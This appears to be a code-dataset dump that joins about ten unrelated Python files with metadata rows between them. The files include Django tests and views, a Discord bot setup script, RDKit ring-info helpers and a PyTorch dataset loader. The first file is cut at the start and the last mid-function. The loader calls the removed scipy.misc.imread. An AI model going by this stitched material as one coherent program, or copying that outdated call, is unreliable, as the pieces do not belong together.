"organization", "app-1", "staging", "5ac5ee8"
)
git_provider_mock.protect_branch.assert_called_once_with(
"organization", "app-1", "staging", "some-user-login"
)
self.assertEqual(result, {"created": (True, True), "protected": (True, True)})
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_non_existing_repo(self, _logger_mock):
"""Should raise an error."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
git_provider_mock.get_branch.side_effect = GitResourceNotFoundError(GitResource.REPOSITORY)
# Test
with self.assertRaises(GitResourceNotFoundError) as context:
_create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
self.assertEqual(context.exception.resource, GitResource.REPOSITORY)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_existing_protected_branch(self, _logger_mock):
"""Should not modify branch."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
staging_branch = MagicMock(spec=Branch.Branch)
staging_branch.protected = True
git_provider_mock.get_branch.return_value = staging_branch
# Test
result = _create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
git_provider_mock.get_branch.assert_called_once_with("organization", "app-1", "staging")
git_provider_mock.create_branch.assert_not_called()
git_provider_mock.protect_branch.assert_not_called()
self.assertEqual(result, {"created": (False, True), "protected": (False, True)})
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_existing_unprotected_branch(self, _logger_mock):
"""Should only protect the branch."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
staging_branch = MagicMock(spec=Branch.Branch)
staging_branch.protected = False
git_provider_mock.get_branch.return_value = staging_branch
# Test
result = _create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
git_provider_mock.get_branch.assert_called_once_with("organization", "app-1", "staging")
git_provider_mock.create_branch.assert_not_called()
git_provider_mock.protect_branch.assert_called_once_with(
"organization", "app-1", "staging", "some-user-login"
)
self.assertEqual(result, {"created": (False, True), "protected": (True, True)})
def test_get_workflow_branches(self):
"""Should return the list of workflow branches."""
fake_config = {"workflow": ["integration", "staging", "master"]}
result = _get_workflow_branches(fake_config, "master")
self.assertEqual(result, ["integration", "staging"])
def test_get_workflow_branches_with_empty_config(self):
"""Should return an empty list."""
result = _get_workflow_branches({}, "master")
self.assertEqual(result, [])
def test_get_workflow_branches_with_empty_workflow(self):
"""Should return an empty list."""
result = _get_workflow_branches({"workflow": []}, "master")
self.assertEqual(result, [])
| 44.701195 | 99 | 0.688948 | 1,263 | 11,220 | 5.760887 | 0.092637 | 0.065008 | 0.086586 | 0.057724 | 0.857064 | 0.825179 | 0.798378 | 0.768829 | 0.757971 | 0.745739 | 0 | 0.004138 | 0.203119 | 11,220 | 250 | 100 | 44.88 | 0.809641 | 0.052763 | 0 | 0.558011 | 0 | 0 | 0.165449 | 0.073333 | 0 | 0 | 0 | 0 | 0.176796 | 1 | 0.060773 | false | 0 | 0.033149 | 0 | 0.099448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae3cb240c9c5d03df3970047b95d95c471c1713e | 6,054 | py | Python | setup.py | NeilDevelopment/BeepBoopBot | 1ad7d987a7f27b2585d58d6d4d3a6257c5f4ab82 | [
"MIT"
] | null | null | null | setup.py | NeilDevelopment/BeepBoopBot | 1ad7d987a7f27b2585d58d6d4d3a6257c5f4ab82 | [
"MIT"
] | 2 | 2022-03-28T07:57:18.000Z | 2022-03-28T08:42:16.000Z | setup.py | NeilDevelopment/BeepBoopBot | 1ad7d987a7f27b2585d58d6d4d3a6257c5f4ab82 | [
"MIT"
] | null | null | null | import time
import os
def setup():
print("\n")
token = input("Please enter your Bot token\n")
prefix = input("Please enter your Bot prefix\n")
member = input("Please enter your Member role ID\n")
mod = input("Please enter your Moderator role ID\n")
admin = input("Please enter your Admin role ID\n")
guild = input("Please enter your Guild ID\n")
log_channel = input("Please enter the channel ID for logs. (If you do not want to enable logs please press ENTER)\n")
print("\n\n")
print("Confirm with these values.")
time.sleep(2)
print(f"Token: {token}")
print(f"Prefix: {prefix}")
print(f"Member Role ID: {member}")
print(f"Moderator Role ID: {mod}")
print(f"Admin Role ID: {admin}")
print(f"Guild ID: {guild}")
print(f"Log Channel ID: {log_channel}")
info_recheck = input("Is that information correct? [Y/N]\n")
if info_recheck == "Y" or info_recheck == "y":
print("Please wait while the bot is being setup.")
with open(".env", "w") as env:
env.write(f"TOKEN={token}" + "\n")
env.write(f"PREFIX={prefix}" + "\n")
env.write(f"MEMBER_ROLE={member}" + "\n")
env.write(f"MODERATOR_ROLE={mod}" + "\n")
env.write(f"ADMIN_ROLE={admin}" + "\n")
env.write(f"GUILD_ID={guild}" + "\n")
env.write(f"LOG_CHANNEL={log_channel}")
if log_channel == "":
os.chdir("cogs")
os.remove("logs.py")
os.chdir("..")
print("File logs.py removed.")
time.sleep(5)
exit()
else:
print("Setup complete.")
time.sleep(5)
exit()
if info_recheck == "N" or info_recheck == "n":
print("Please restart the setup.")
exit()
def tutorial():
print("Welcome to the BeepBoopBot Tutorial! We will explain how to get information needed for the setup here.")
print("\nToken: Go to https://discord.com/developers/applications and click on your Application\nthen click on the 'Bot' in left sidebar, click on 'Copy' under your Bot's name\n")
print("Prefix: Enter the prefix you want for your bot\n")
print("Member Role: Go to the Discord App, Right click on your Member role and click 'Copy ID'.\n")
print("Moderator Role: Go to the Discord App, Right click on your Moderator role and click 'Copy ID'.\n")
print("Admin Role: Go to the Discord App, Right click on your Admin role and click 'Copy ID'.\n")
print("Guild ID: Go to the Discord App, Right click on your Guild and click 'Copy ID'.\n")
print("Log Channel ID: Go to the Discord App, Right click on your Log Channel and click 'Copy ID'.\n")
setup_after_tutorial = input("Do you want to go back to the setup? [Y/N]\n")
if setup_after_tutorial == "Y" or setup_after_tutorial == "y":
main()
else:
exit()
def setup_and_tutorial():
print("\n")
    token = input("Please enter your Bot token\nSteps: Go to https://discord.com/developers/applications and click on your Application,\nthen click on 'Bot' in the left sidebar and click 'Copy' under your Bot's name\n")
prefix = input("Please enter your Bot prefix\nSteps: Enter the prefix you want for your bot\n")
member = input("Please enter your Member ID\nSteps: Go to the Discord App, Right click on your Member role and click 'Copy ID'.\n")
mod = input("Please enter your Moderator ID\nSteps: Go to the Discord App, Right click on your Moderator role and click 'Copy ID'.\n")
admin = input("Please enter your Admin ID\nSteps: Go to the Discord App, Right click on your Admin role and click 'Copy ID'.\n")
guild = input("Please enter your Guild ID\nSteps: Go to the Discord App, Right click on your Guild and click 'Copy ID'.\n")
log_channel = input("Please enter the channel ID for logs. (Press ENTER to disable logs)\nSteps: Go to the Discord App, Right click on your Log Channel and click 'Copy ID'.\n")
print("\n\n")
print("Confirm with these values.")
time.sleep(2)
print(f"Token: {token}")
print(f"Prefix: {prefix}")
print(f"Member Role ID: {member}")
print(f"Moderator Role ID: {mod}")
print(f"Admin Role ID: {admin}")
print(f"Guild ID: {guild}")
print(f"Log Channel ID: {log_channel}")
info_recheck = input("Is that information correct? [Y/N]\n")
if info_recheck == "Y" or info_recheck == "y":
print("Please wait while the bot is being setup.")
with open(".env", "w") as env:
env.write(f"TOKEN={token}" + "\n")
env.write(f"PREFIX={prefix}" + "\n")
env.write(f"MEMBER_ROLE={member}" + "\n")
env.write(f"MODERATOR_ROLE={mod}" + "\n")
env.write(f"ADMIN_ROLE={admin}" + "\n")
env.write(f"GUILD_ID={guild}" + "\n")
env.write(f"LOG_CHANNEL={log_channel}")
if log_channel == "":
os.chdir("cogs")
os.remove("logs.py")
os.chdir("..")
print("File logs.py removed.")
time.sleep(5)
exit()
else:
print("Setup complete.")
time.sleep(5)
exit()
if info_recheck == "N" or info_recheck == "n":
print("Please restart the setup.")
exit()
def main():
    print("Welcome to the BeepBoopBot setup.")
    choice = input("Please choose from the following options:\n[1] Tutorial\n[2] Setup\n[3] Both\n[4] Exit\n")
    if choice == "1":
        tutorial()
    elif choice == "2":
        setup()
    elif choice == "3":
        setup_and_tutorial()
    elif choice == "4":
        exit()
    else:
        print("Please enter a valid option.")
        main()
if __name__ == "__main__":
main() | 48.047619 | 449 | 0.572184 | 857 | 6,054 | 3.988331 | 0.134189 | 0.032768 | 0.065535 | 0.070217 | 0.834699 | 0.818315 | 0.816852 | 0.793446 | 0.73464 | 0.674664 | 0 | 0.003279 | 0.294681 | 6,054 | 126 | 450 | 48.047619 | 0.79719 | 0 | 0 | 0.658333 | 0 | 0.116667 | 0.565318 | 0.008258 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.016667 | 0 | 0.05 | 0.316667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae4089bedfddc1a6ca8fc1b6728941395f3b414d | 196 | py | Python | content/admin.py | pratikgoel145/AlgoBuddy-Web-Application | 2ea3c6e3ca1127aced9968319d9a9bb7978b66bf | [
"MIT"
] | null | null | null | content/admin.py | pratikgoel145/AlgoBuddy-Web-Application | 2ea3c6e3ca1127aced9968319d9a9bb7978b66bf | [
"MIT"
] | null | null | null | content/admin.py | pratikgoel145/AlgoBuddy-Web-Application | 2ea3c6e3ca1127aced9968319d9a9bb7978b66bf | [
"MIT"
] | 1 | 2017-10-25T10:25:03.000Z | 2017-10-25T10:25:03.000Z | from django.contrib import admin
from .models import Post, Comment, Markread
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Markread)
# admin.site.register(Profile) | 19.6 | 43 | 0.80102 | 27 | 196 | 5.814815 | 0.444444 | 0.229299 | 0.433121 | 0.318471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091837 | 196 | 10 | 44 | 19.6 | 0.882022 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ae4b2dce74d1c00c6d5106f8c1070015b15d50d4 | 253 | py | Python | dataloader/__init__.py | doc-doc/NExT-OE | a45d81a48ab5ccc45ff6f7bea60597cc59bc546e | [
"MIT"
] | 7 | 2021-05-28T02:57:23.000Z | 2022-03-28T13:37:43.000Z | dataloader/__init__.py | doc-doc/NExT-OE | a45d81a48ab5ccc45ff6f7bea60597cc59bc546e | [
"MIT"
] | 1 | 2021-06-18T08:40:56.000Z | 2021-06-18T09:47:23.000Z | dataloader/__init__.py | doc-doc/NExT-OE | a45d81a48ab5ccc45ff6f7bea60597cc59bc546e | [
"MIT"
] | null | null | null | # ====================================================
# @Time : 15/5/20 3:48 PM
# @Author : Xiao Junbin
# @Email : junbin@comp.nus.edu.sg
# @File : __init__.py
# ====================================================
from .sample_loader import * | 36.142857 | 54 | 0.355731 | 23 | 253 | 3.695652 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036697 | 0.13834 | 253 | 7 | 55 | 36.142857 | 0.353211 | 0.837945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ae8cd42184ddff35e348d1530812a6ae8e4b3df9 | 6,088 | py | Python | sustainableCityManagement/tests/Bike_API/test_graphvalues_bike.py | Josh-repository/Dashboard-CityManager- | 6287881be9fb2c6274a755ce5d75ad355346468a | [
"RSA-MD"
] | null | null | null | sustainableCityManagement/tests/Bike_API/test_graphvalues_bike.py | Josh-repository/Dashboard-CityManager- | 6287881be9fb2c6274a755ce5d75ad355346468a | [
"RSA-MD"
] | null | null | null | sustainableCityManagement/tests/Bike_API/test_graphvalues_bike.py | Josh-repository/Dashboard-CityManager- | 6287881be9fb2c6274a755ce5d75ad355346468a | [
"RSA-MD"
] | 1 | 2021-05-13T16:33:18.000Z | 2021-05-13T16:33:18.000Z | from main_project.Bike_API.graphvalues_bike import GraphValuesBike
from main_project.Bike_API import fetch_bikeapi
from main_project.Bike_API.store_bikedata_to_database import StoreBikeDataToDatabase
from main_project.Bike_API.store_processed_bikedata_to_db import StoreProcessedBikeDataToDB
from main_project.Bike_API.fetch_bikeapi import FetchBikeApi
from django.test import TestCase
from unittest.mock import MagicMock
import datetime
from freezegun import freeze_time
@freeze_time("2021-03-11 17")
class TestGraphValuesBike(TestCase):
@classmethod
def setUpTestData(cls):
pass
def test_graphvalue_call_locationbased_returns_error_with_days_historical_0(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_locationbased(days_historical=0)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_locationbased_returns_error_with_days_historical_1(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_locationbased(days_historical=1)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_locationbased(self):
graph_values_bike = GraphValuesBike()
store_processed_bike_data_to_database = StoreProcessedBikeDataToDB()
mocked_fetch_processed_data = [
{
"name": "test_abcd",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 10,
"total_stands": 50
}
]
},
{
"name": "test_abcdef",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 15,
"total_stands": 20
}
]
}
]
mocked_fetch_predicted_data = [
{
"name": "test_abcd",
"data": {
"in_use": 11
}
},
{
"name": "test_abcdef",
"data": {
"in_use": 12
}
}
]
store_processed_bike_data_to_database.fetch_processed_data = MagicMock(
return_value=mocked_fetch_processed_data)
store_processed_bike_data_to_database.fetch_predicted_data = MagicMock(
return_value=mocked_fetch_predicted_data)
expected_result = {
'test_abcd': {
'TOTAL_STANDS': 50,
'IN_USE': {
'2021-03-12': 11,
'2021-03-15': 10
}
},
'test_abcdef': {
'TOTAL_STANDS': 20,
'IN_USE': {
'2021-03-12': 12,
'2021-03-15': 15
}
}
}
result = graph_values_bike.graphvalue_call_locationbased(days_historical=2,
store_processed_bike_data_to_db=store_processed_bike_data_to_database)
self.assertDictEqual(result, expected_result)
def test_graphvalue_call_overall_returns_error_with_days_historical_0(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_overall(days_historical=0)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_overall_returns_error_with_days_historical_1(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_overall(days_historical=1)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_overall(self):
graph_values_bike = GraphValuesBike()
store_processed_bike_data_to_database = StoreProcessedBikeDataToDB()
mocked_fetch_processed_data = [
{
"name": "test_abcd",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 10,
"total_stands": 50
}
]
},
{
"name": "test_abcdef",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 15,
"total_stands": 20
}
]
}
]
mocked_fetch_predicted_data = [
{
"name": "test_abcd",
"data": {
"in_use": 11
}
},
{
"name": "test_abcdef",
"data": {
"in_use": 12
}
}
]
store_processed_bike_data_to_database.fetch_processed_data = MagicMock(
return_value=mocked_fetch_processed_data)
store_processed_bike_data_to_database.fetch_predicted_data = MagicMock(
return_value=mocked_fetch_predicted_data)
expected_result = {
'ALL_LOCATIONS': {
'TOTAL_STANDS': 20,
'IN_USE': {
'2021-03-12': 12,
'2021-03-15': 15
}
}
}
result = graph_values_bike.graphvalue_call_overall(days_historical=2,
store_processed_bike_data_to_db=store_processed_bike_data_to_database)
self.assertDictEqual(result, expected_result)
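The tests above isolate `GraphValuesBike` from the database by assigning `MagicMock` objects to the store's fetch methods and injecting the store into the call under test. A minimal stdlib sketch of that dependency-injection pattern (the `Store` and `compute` names here are hypothetical stand-ins, not part of the project):

```python
from unittest.mock import MagicMock

class Store:
    """Stand-in for StoreProcessedBikeDataToDB; the real method would hit a DB."""
    def fetch_processed_data(self, days):
        raise RuntimeError("no database available in tests")

def compute(store, days):
    # The code under test only depends on the store's interface,
    # so a MagicMock drops in cleanly for the real implementation.
    rows = store.fetch_processed_data(days)
    return {r["name"]: r["in_use"] for r in rows}

store = Store()
store.fetch_processed_data = MagicMock(return_value=[{"name": "a", "in_use": 10}])
result = compute(store, days=2)
assert result == {"a": 10}
store.fetch_processed_data.assert_called_once_with(2)
```

Because the mock records its calls, the test can verify both the returned value and that the collaborator was invoked with the expected arguments.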
# ====================================================
# @File : voxel_globe/tiepoint_registration/views.py
# ====================================================
from django.shortcuts import render
from django.http import HttpResponse
from django.template import RequestContext, loader
def tiepoint_registration_1(request):
from voxel_globe.meta import models
image_set_list = models.ImageSet.objects.all()
return render(request, 'tiepoint_registration/html/tiepoint_registration_1.html',
{'image_set_list':image_set_list})
def tiepoint_registration_2(request, image_set_id):
from voxel_globe.meta import models
camera_set_list = models.ImageSet.objects.get(id=image_set_id).cameras.all()
return render(request, 'tiepoint_registration/html/tiepoint_registration_2.html',
{'camera_set_list':camera_set_list,
'image_set_id':image_set_id})
def tiepoint_registration_3(request, image_set_id, camera_set_id):
from voxel_globe.tiepoint_registration import tasks
image_set_id = int(image_set_id)
t = tasks.tiepoint_registration.apply_async(args=(image_set_id,camera_set_id), user=request.user)
return render(request, 'tiepoint_registration/html/tiepoint_registration_3.html',
{'task_id': t.task_id})
def tiepoint_error_1(request):
from voxel_globe.meta import models
image_set_list = models.ImageSet.objects.all()
return render(request, 'tiepoint_registration/html/tiepoint_error_1.html',
{'image_set_list':image_set_list})
def tiepoint_error_2(request, image_set_id):
from voxel_globe.meta import models
camera_set_list = models.ImageSet.objects.get(id=image_set_id).cameras.all()
return render(request, 'tiepoint_registration/html/tiepoint_error_2.html',
{'camera_set_list':camera_set_list,
'image_set_id':image_set_id})
def tiepoint_error_3(request, image_set_id, camera_set_id):
from voxel_globe.meta import models
scene_list = models.Scene.objects.all()
return render(request, 'tiepoint_registration/html/tiepoint_error_3.html',
{'scene_list':scene_list,
'camera_set_id':camera_set_id,
'image_set_id':image_set_id})
def tiepoint_error_4(request, image_set_id, camera_set_id, scene_id):
from voxel_globe.tiepoint_registration import tasks
image_set_id = int(image_set_id)
t = tasks.tiepoint_error_calculation.apply_async(args=(image_set_id,
camera_set_id,
scene_id),
user=request.user)
return render(request, 'tiepoint_registration/html/tiepoint_error_4.html',
{'task_id': t.task_id})
def order_status(request, task_id):
from celery.result import AsyncResult
task = AsyncResult(task_id)
return render(request, 'task/html/task_3d_error_results.html',
                {'task': task})
# ====================================================
# @File : markflow/detectors/table.py
# ====================================================
from typing import List
def table_started(line: str, index: int, lines: List[str]) -> bool:
return line.lstrip().startswith("|")
def table_ended(line: str, index: int, lines: List[str]) -> bool:
return not table_started(line, index, lines)
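The two detectors above flag markdown table boundaries purely by whether a stripped line starts with a pipe. A quick sanity check of that rule (the functions are re-declared so the snippet is self-contained):

```python
from typing import List

def table_started(line: str, index: int, lines: List[str]) -> bool:
    return line.lstrip().startswith("|")

def table_ended(line: str, index: int, lines: List[str]) -> bool:
    return not table_started(line, index, lines)

lines = ["| a | b |", "|---|---|", "| 1 | 2 |", "", "after the table"]
starts = [table_started(l, i, lines) for i, l in enumerate(lines)]
assert starts == [True, True, True, False, False]
assert table_ended(lines[3], 3, lines)  # blank line ends the table
```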
# ====================================================
# @File : tests/tests/test_initial.py
# ====================================================
def test_initial():
assert True
# ====================================================
# @File : chembl_beaker/beaker/core_apps/ringInfo/impl.py
# ====================================================
__author__ = 'mnowotka'
from rdkit import Chem
from rdkit.Chem.rdmolops import SanitizeFlags as sf
SANITIZE_ALL = sf.SANITIZE_ALL
from chembl_beaker.beaker.utils.functional import _apply, _call
from chembl_beaker.beaker.utils.io import _parseMolData, _getSDFString
#-----------------------------------------------------------------------------------------------------------------------
def _atomRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'AtomRings')
#-----------------------------------------------------------------------------------------------------------------------
def _bondRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'BondRings')
#-----------------------------------------------------------------------------------------------------------------------
def _isAtomInRing(data, index, size, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'IsAtomInRingOfSize', index, size)
#-----------------------------------------------------------------------------------------------------------------------
def _isBondInRing(data, index, size, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'IsBondInRingOfSize', index, size)
#-----------------------------------------------------------------------------------------------------------------------
def _numAtomRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
ring_infos = _call(mols, 'GetRingInfo')
return [[ring_info.NumAtomRings(atom.GetIdx()) for atom in mol.GetAtoms()] for (mol, ring_info) in zip(mols, ring_infos)]
#-----------------------------------------------------------------------------------------------------------------------
def _numBondRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
ring_infos = _call(mols, 'GetRingInfo')
return [[ring_info.NumBondRings(bond.GetIdx()) for bond in mol.GetBonds()] for (mol, ring_info) in zip(mols, ring_infos)]
#-----------------------------------------------------------------------------------------------------------------------
def _numRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'NumRings')
#-----------------------------------------------------------------------------------------------------------------------
| 58.314815 | 125 | 0.536361 | 251 | 3,149 | 6.545817 | 0.207171 | 0.087645 | 0.08521 | 0.102252 | 0.749848 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0 | 0 | 0.079708 | 3,149 | 53 | 126 | 59.415094 | 0.566943 | 0.302318 | 0 | 0.310345 | 0 | 0 | 0.067154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.241379 | false | 0 | 0.137931 | 0 | 0.62069 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# ====================================================
# @File : WRN-backbone-32/utils/wol_datasets.py
# ====================================================
import os
import pdb
import sys
import cv2
import pickle
import scipy.misc
import scipy.io
from scipy import ndimage
from scipy.ndimage import gaussian_filter
import numpy as np
import random
import json
from PIL import Image
from torchvision import datasets
# from caltech_my import Caltech101, Caltech256
# import torch.nn.functional as F
# from torch_geometric.data import Data, Batch
import torch.nn.functional as F
# --- coco api --------------
import json
import time
from collections import defaultdict
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 2:
from urllib import urlretrieve
elif PYTHON_VERSION == 3:
from urllib.request import urlretrieve
def _isArrayLike(obj):
return hasattr(obj, '__iter__') and hasattr(obj, '__len__')
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
from kornia.enhance.zca import ZCAWhitening
from .config import *
# *** MS_COCO uses one transform; CUB & ILSVRC use another transform
class MS_COCO(Dataset):
def __init__(self, root, mode='train', return_path=False, N=None,
img_h = COCO_RESIZE[0], img_w = COCO_RESIZE[1], transform=None): #'train', 'test', 'val'
self.path_dataset = root
self.path_images = os.path.join(self.path_dataset, mode+'2014')
self.return_path = return_path
self.img_h = img_h
self.img_w = img_w
self.transform = transform
# self.normalize_feature = normalize_feature
# get list images
list_names = os.listdir(self.path_images)
list_names = np.array([n.split('.')[0] for n in list_names])
self.list_names = list_names
# if mode=='train':
# list_names = np.array(['COCO_train2014_000000001108',
# 'COCO_train2014_000000002148',
# 'COCO_train2014_000000003348',
# 'COCO_train2014_000000004575'])
# elif mode=='val':
# list_names = np.array(['COCO_val2014_000000005586',
# 'COCO_val2014_000000011122',
# 'COCO_val2014_000000016733',
# 'COCO_val2014_000000022199'])
#
# self.list_names = list_names
if N is not None:
self.list_names = list_names[:N]
# self.coco = COCO(os.path.join(PATH_COCO, 'annotations', 'instances_%s2014.json'%mode))
self.imgNsToCat = pickle.load(open(os.path.join(PATH_COCO, 'imgNsToCat_{}.p'.format(mode)), "rb"))
# if mode=='train':
# random.shuffle(self.list_names)
# embed()
print("Init MS_COCO full dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
# Image and saliency map paths
rgb_ima = os.path.join(self.path_images, self.list_names[index]+'.jpg')
image = scipy.misc.imread(rgb_ima, mode='RGB')
image = cv2.resize(image, (self.img_w, self.img_h), interpolation=cv2.INTER_AREA).astype(np.float32)
if self.transform is not None:
img_processed = self.transform(image/255.)
else:
img_processed = transforms.ToTensor()(image)
# get coco label
label_indices = self.imgNsToCat[self.list_names[index]]
# label_indices = self.coco.imgNsToCat[self.list_names[index]]
label = torch.zeros(coco_num_classes)
if len(label_indices)>0:
label[label_indices] = 1
else:
label[0] = 1
if self.return_path:
return img_processed, label, self.list_names[index]
else:
return img_processed, label
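`MS_COCO.__getitem__` builds a multi-hot target: a zero vector over all categories with ones at the image's category indices, falling back to index 0 when the image has no annotations. The same logic in plain Python (using a small class count for illustration; the real code uses a `torch` tensor of length `coco_num_classes`):

```python
def multi_hot(label_indices, num_classes):
    # Multi-label target: 1.0 at each present category index,
    # with index 0 as the fallback when no annotations exist.
    label = [0.0] * num_classes
    if len(label_indices) > 0:
        for idx in label_indices:
            label[idx] = 1.0
    else:
        label[0] = 1.0
    return label

assert multi_hot([2, 5], 8) == [0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0]
assert multi_hot([], 4) == [1.0, 0.0, 0.0, 0.0]
```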
# CUB
def get_name_id(name_path):
name_id = name_path.strip().split('/')[-1]
name_id = name_id.strip().split('.')[0]
return name_id
class CUB(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_CUB?
self.mode = mode
# self.path_images = os.path.join(self.path_dataset, mode + '2014')
self.path_images = os.path.join(self.path_dataset, 'images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'lists/%s_list.txt'%self.mode)
list_names, labels = self.read_labeled_image_list(self.path_images, self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init CUB_200_2011 dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = self.list_names[index]
        assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
            gt_label = self.labels[index].astype(np.int64)  # np.int64 replaces the removed np.long alias
if self.return_path:
return image, gt_label, img_name.split('/')[-1].split('.')[0]
else:
return image, gt_label
def read_labeled_image_list(self, data_dir, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = map(int, line[1:])
img_name_list.append(os.path.join(data_dir, image))
